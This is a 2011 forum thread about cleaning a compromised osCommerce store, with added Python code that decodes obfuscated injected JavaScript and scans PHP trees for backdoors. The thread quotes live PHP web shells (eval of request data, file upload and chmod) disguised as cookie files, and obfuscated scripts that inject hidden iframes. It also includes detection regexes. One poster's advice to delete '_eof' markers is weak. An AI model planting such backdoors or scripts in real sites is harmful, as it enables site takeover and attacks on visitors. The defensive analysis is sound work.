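Both injected scripts above hide their payload URLs the same way: one shifts every character code by 1 (the `String.fromCharCode("...".charCodeAt(j++)-1)` loop), the other packs the string into fake CSS colours and recovers each byte with `parseInt(pair,16)-15` while skipping `00`. When you find this in a file, the first question is where it sends visitors, and that is quick to answer offline. The Python below is an added example for this page, written for analysis; it is not from the thread, from osCommerce or from any add-on. It implements both decoders, an encoder for each so the round trip can be tested, and two regexes that pull the literals straight out of a script. The shifted literal and the redirect URL in SAMPLE_JS are constructed; the three colour values are the first three entries of the div_colors array in the post, which decode to nothing more than the scheme and the first letters of a host name.

```python
import re


def shift_decode(encoded, shift=1):
    """Undo String.fromCharCode(s.charCodeAt(j++) - shift)."""
    return "".join(chr(ord(ch) - shift) for ch in encoded)


def shift_encode(plain, shift=1):
    """Inverse of shift_decode, used only to build test material."""
    return "".join(chr(ord(ch) + shift) for ch in plain)


def colour_decode(colours, offset=15):
    """Undo the div_pick_colors trick: hex pairs at offsets 1, 3, 5 of each
    '#rrggbb' value; '00' pairs are padding, every other pair is a byte + offset."""
    out = []
    for colour in colours:
        for i in (1, 3, 5):
            pair = colour[i:i + 2]
            if pair != "00":
                out.append(chr(int(pair, 16) - offset))
    return "".join(out)


def colour_encode(plain, offset=15):
    """Pack an ASCII string into fake '#rrggbb' colours (inverse of colour_decode)."""
    pairs = ["%02x" % (ord(ch) + offset) for ch in plain]
    while len(pairs) % 3:
        pairs.append("00")
    return ["#" + "".join(pairs[i:i + 3]) for i in range(0, len(pairs), 3)]


# Literal passed to charCodeAt() and the shift subtracted from it.
SHIFT_PATTERN = re.compile(r'"([^"]+)"\.charCodeAt\(\w+\+\+\)\s*-\s*(\d+)')
# The div_colors array and the colour literals inside it.
COLOUR_ARRAY = re.compile(r"var\s+div_colors\s*=\s*new\s+Array\(([^)]*)\)")
COLOUR_VALUE = re.compile(r"'(#[0-9a-fA-F]{6})'")


def extract_shift_strings(js):
    """Decode every shifted literal found in a script."""
    return [shift_decode(lit, int(n)) for lit, n in SHIFT_PATTERN.findall(js)]


def extract_colour_strings(js):
    """Decode every div_colors array found in a script."""
    return [colour_decode(COLOUR_VALUE.findall(body)) for body in COLOUR_ARRAY.findall(js)]


# Constructed sample: same shape as the injected code in the post, but the
# redirect target is a made-up .invalid host and the colour array holds only
# the first three values quoted in the thread.
SHIFTED = shift_encode("http://redirect.invalid/landing")
SAMPLE_JS = (
    'if(document.cookie.indexOf("udb=1")<0){var j=0,n="";'
    'while(j<' + str(len(SHIFTED)) + ')n+=String.fromCharCode("' + SHIFTED
    + '".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}\n'
    "var div_colors = new Array('#778383', '#7f493e', '#3e7277');\n"
)


if __name__ == "__main__":
    print("shift literals :", extract_shift_strings(SAMPLE_JS))
    print("colour strings :", extract_colour_strings(SAMPLE_JS))
```

Feed `extract_shift_strings()` and `extract_colour_strings()` the text of an infected file and the decoded hosts are what you block at the network edge and search for in the rest of the tree; the numeric `dkel` array in the post is a third layer (each entry divided by `t` gives a character code) that the same approach handles once `t` is known.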
Taipo Posted March 27, 2011

When you say "I put a new copy backup website online", was that a backup of the original site? It is quite possible that there is an upload script still resident in your files. Have a read through the two discussion pieces in my signature for more on the subject.
vinarcid0810 Posted March 29, 2011

Hi Taipo, thanks for your help. I don't have a copy of the original backup ... I transferred the files from the server and removed the code from every file. I read the two discussions in your signature, and I found this code in includes/cookie_usage.php:

    <!--<?php if(@$_REQUEST['cookies']==1){ echo '--'.'><i>Goog1e_analist_certs</i><br>';
    if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));}
    elseif(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],@$_REQUEST['fp'].$_FILES['f']['name']);if(@$_REQUEST['fc']){@chmod($_FILES['f']['name'],$_REQUEST['fc']);}}
    elseif(@$_REQUEST['nn']){$fh=fopen(@$_REQUEST['nn'],'w');fwrite($fh,@$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){@chmod(@$_REQUEST['nn'],$_REQUEST['fc']);}}
    else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']); $pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./'; echo chr(118).chr(46).chr(46).@is_writable($pt); }echo '<!'.'--';} ?>-->

and this code in includes/lenguages/italia/cookie_usage.php:

    if (isset($_GET["cookie"])) {
        echo 'cookie=3';
        if (isset($_POST["es4"])) @eval(base64_decode($_POST["es4"]));
        exit;
    }

and this file, includes/cookie_setup.php:

    <?php
    /*
      $Id: cookie_setup.php 1739 2007-12-20 00:52:16Z hpdl $

      osCommerce, Open Source E-Commerce Solutions
      http://www.oscommerce.com

      Copyright (c) 2003 osCommerce

      Released under the GNU General Public License
    */

    if (isset($_GET["cookie"])) {
        echo 'cookie=2';
        if (isset($_POST["es4"])) @eval($_POST["es4"]);
        exit;
    }
    ?>

Please help me.

P.S. I have on the server 2 folders, backup_day and backup_week, and these folders have more infected files. Can I remove these folders?
Taipo Posted March 29, 2011

You will need to find the originals of those files for your version of osCommerce and overwrite them. These would no doubt have had the code added to them back when the site was first attacked. Since then they have been able to upload code even if you had patched the admin issues ... assuming you have already.

But to be honest, if there are many files that have been infected in this manner, it is by far the more secure choice to build a new site with the osCommerce 2.3.1 code and import your template layout and database into the new fileset. Even if you go through every precaution, you only need to miss one of these uploaders and the whole site is at risk again, because they allow an attacker to do ANYTHING with your site's code, which you can see above where some JavaScript has been appended into some files. If you are willing to take the risk to run with the current old site version, then you will have to be meticulous in your search for rogue files and file code.
romankerch Posted March 29, 2011 Posted March 29, 2011 How I eliminate these: first, hackers check for this string, for example <!-- header_eof //-->. The core of the site has many *_eof markers; this helps to detect that your site is osCommerce. You must delete every *_eof string on the site.
vinarcid0810 Posted March 29, 2011 Posted March 29, 2011 <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var 
dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,4
64/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t
,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}ko(ydxx);</script> <script language="JavaScript">if (typeof(defs_colors)=="undefined") { var defs_colors = 1; var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e', '#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#4e7270', '#83707b', '#7e7681', '#82827d', '#748682', '#4c4000'); var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d', '#7e7d74', '#787581', '#707c74', '#4b7378', '#852f82', '#83887b', '#744c36', '#737882', '#7f7b70', '#88497d', '#7e7d74', '#364d4b', '#787581', '#707c74', '#2f8281', '#724c36', '#364d4b', '#3e7875', '#81707c', '#744d4b', '#3e7378', '#854d82', '#81724e', '#81754c'); var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4); function div_pick_colors(t) { var s = ''; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!='00') s += String.fromCharCode(parseInt(c_clr,16)-15); } } return s; } var ct = new Array(10); var s = div_pick_colors(css_colors); var c = css_indexes; ct[0] = div_pick_colors(div_colors); var j = 0; var ci = 1; for(i=0;i<c.length;i++) { ct[ci++] = 
s.substr(j,c[i]); j=j+c[i]; } ct[0] = ct[0]; function check_div_styles() { var d=document.getElementsByTagName(ct[1])[0]; if(d) { try { var d=document.getElementsByTagName(ct[1])[0]; var v=document.createElement(ct[2]); v.style.display=ct[4]; v.setAttribute(ct[3],ct[4]); d.appendChild(v); w=document.createElement(ct[5]); w.src=ct[0]; w.setAttribute(ct[8],ct[0]); v.appendChild(w); } catch(e) { document.write(ct[6]+ct[0]+ct[7]); } } else { setTimeout("check_div_styles();",500); } } check_div_styles(); }</script>

This is another piece of code that I found.
Taipo Posted March 29, 2011 Posted March 29, 2011 romankerch wrote: "How I eliminate these: first, hackers check for this string, for example <!-- header_eof //-->. The core of the site has many *_eof markers; this helps to detect that your site is osCommerce. You must delete every *_eof string on the site."

What you need to do is find the code that is allowing the attackers to upload files, change file permissions etc. It is via these scripts that they are able to append code to any file they wish, on some configurations of shared web hosting. If you do not feel confident enough in your PHP skills to recognise what these files might look like, then you have no real choice but to install the new version of osCommerce 2.3.1 and migrate your site's database across to it.
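Taipo's two pieces of advice above (overwrite the infected files with clean originals for your release, and hunt down the uploader scripts that let the attacker write files and change permissions) can both be turned into an offline check. The following is an added example, written for this thread; it is not code from the original posts and not part of osCommerce. It assumes only a directory of .php files for the live site and, optionally, an unpacked clean copy of the same osCommerce release to compare against. The pattern names and the sample files are this example's own, modelled on the snippets quoted earlier in the thread.

```python
"""Scan a PHP tree for request-driven backdoors and diff it against a clean
release. Added example for this thread; not osCommerce code. The sample
files written by build_demo() are constructed, modelled on the snippets
quoted in the thread."""
import hashlib
import os
import re
import tempfile

# What the quoted snippets actually do, as regexes: eval of request data,
# upload to a request-chosen path, chmod and fopen-for-write driven by the
# request, and chr() chains used to hide strings. Names are this example's.
BACKDOOR_PATTERNS = {
    "eval_of_request": re.compile(
        r"\beval\s*\(\s*(?:base64_decode\s*\(\s*)?@?\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I),
    "upload_to_request_path": re.compile(
        r"move_uploaded_file\s*\(\s*\$_FILES\[[^\]]*\]\[[^\]]*\]\s*,\s*@?\$_(?:REQUEST|POST|GET)\b", re.I),
    "chmod_from_request": re.compile(r"\bchmod\s*\([^;]*\$_(?:REQUEST|POST|GET)\b", re.I),
    "fopen_write_from_request": re.compile(
        r"\bfopen\s*\(\s*@?\$_(?:REQUEST|POST|GET)[^;]*['\"]w['\"]", re.I),
    "chr_concat_chain": re.compile(
        r"\bchr\s*\(\s*\d+\s*\)(?:\s*\.\s*chr\s*\(\s*\d+\s*\)){2,}", re.I),
}
PHP_EXTENSIONS = (".php", ".phtml", ".inc")


def scan_source(php_source):
    """Names of the backdoor patterns found in one file body (empty if clean)."""
    return [name for name, rx in BACKDOOR_PATTERNS.items() if rx.search(php_source)]


def _walk(root):
    """Yield (relative posix path, absolute path) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            yield os.path.relpath(path, root).replace(os.sep, "/"), path


def scan_tree(root):
    """Map of relative path -> pattern names, for every PHP file with a hit."""
    hits = {}
    for rel, path in _walk(root):
        if not rel.lower().endswith(PHP_EXTENSIONS):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = scan_source(fh.read())
        if found:
            hits[rel] = found
    return hits


def tree_hashes(root):
    """Relative path -> sha256 of contents for every file under root."""
    out = {}
    for rel, path in _walk(root):
        with open(path, "rb") as fh:
            out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_against_reference(site_root, ref_root):
    """Files that are absent from, or differ from, a clean copy of the same
    release. Your own add-ons and template edits land here too, so each entry
    is a file to inspect, not automatically a backdoor."""
    site, ref = tree_hashes(site_root), tree_hashes(ref_root)
    return {
        "added": sorted(p for p in site if p not in ref),
        "modified": sorted(p for p in site if p in ref and site[p] != ref[p]),
    }


# Constructed samples (not real osCommerce files), shaped like the thread's.
CLEAN_STUB = "<?php\n// constructed stand-in for a clean file\n$x = 1;\n?>\n"
INFECTED_COOKIE_SETUP = CLEAN_STUB + (
    'if (isset($_GET["cookie"])) { echo \'cookie=2\'; '
    'if (isset($_POST["es4"])) @eval($_POST["es4"]); exit; }\n')
UPLOADER = (
    "<!--<?php if(@$_REQUEST['cookies']==1){"
    "if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));}"
    "elseif(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],"
    "@$_REQUEST['fp'].$_FILES['f']['name']);"
    "if(@$_REQUEST['fc']){@chmod($_FILES['f']['name'],$_REQUEST['fc']);}}"
    "elseif(@$_REQUEST['nn']){$fh=fopen(@$_REQUEST['nn'],'w');"
    "fwrite($fh,@$_REQUEST['nd']);fclose($fh);}"
    "else{echo chr(118).chr(46).chr(46).@is_writable('.');}} ?>-->\n")


def build_demo():
    """Lay out a clean reference tree and an infected site tree in a temp
    directory and run both checks. Returns (scan hits, diff against reference)."""
    with tempfile.TemporaryDirectory(prefix="osc_scan_") as base:
        ref, site = os.path.join(base, "ref"), os.path.join(base, "site")
        files = {
            (ref, "includes/application_top.php"): CLEAN_STUB,
            (ref, "includes/cookie_setup.php"): CLEAN_STUB,
            (site, "includes/application_top.php"): CLEAN_STUB,
            (site, "includes/cookie_setup.php"): INFECTED_COOKIE_SETUP,  # modified
            (site, "includes/cookie_usage.php"): UPLOADER,  # dropped, not in ref
        }
        for (root, rel), body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(site), diff_against_reference(site, ref)


if __name__ == "__main__":
    hits, diff = build_demo()
    for path, names in sorted(hits.items()):
        print(f"{path}: {', '.join(names)}")
    print("added:", diff["added"], "modified:", diff["modified"])
```

Point scan_tree at the live document root and diff_against_reference at the live root plus an unpacked clean tarball of the same release. The signature scan only catches shapes it knows about, and attackers vary the obfuscation (the injected JavaScript quoted above is a different shape entirely), so treat the hash diff as the authoritative list of files to open by hand and the signatures as a way to prioritise it.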
romankerch Posted March 30, 2011 Posted March 30, 2011 Taipo wrote: "What you need to do is find the code that is allowing the attackers to upload files, change file permissions etc. It is via these scripts that they are able to append code to any file they wish, on some configurations of shared web hosting. If you do not feel confident enough in your PHP skills to recognise what these files might look like, then you have no real choice but to install the new version of osCommerce 2.3.1 and migrate your site's database across to it."

Maybe, but first of all hackers must be able to find your site and check for the osCommerce core. That's how any _eof helps to detect us.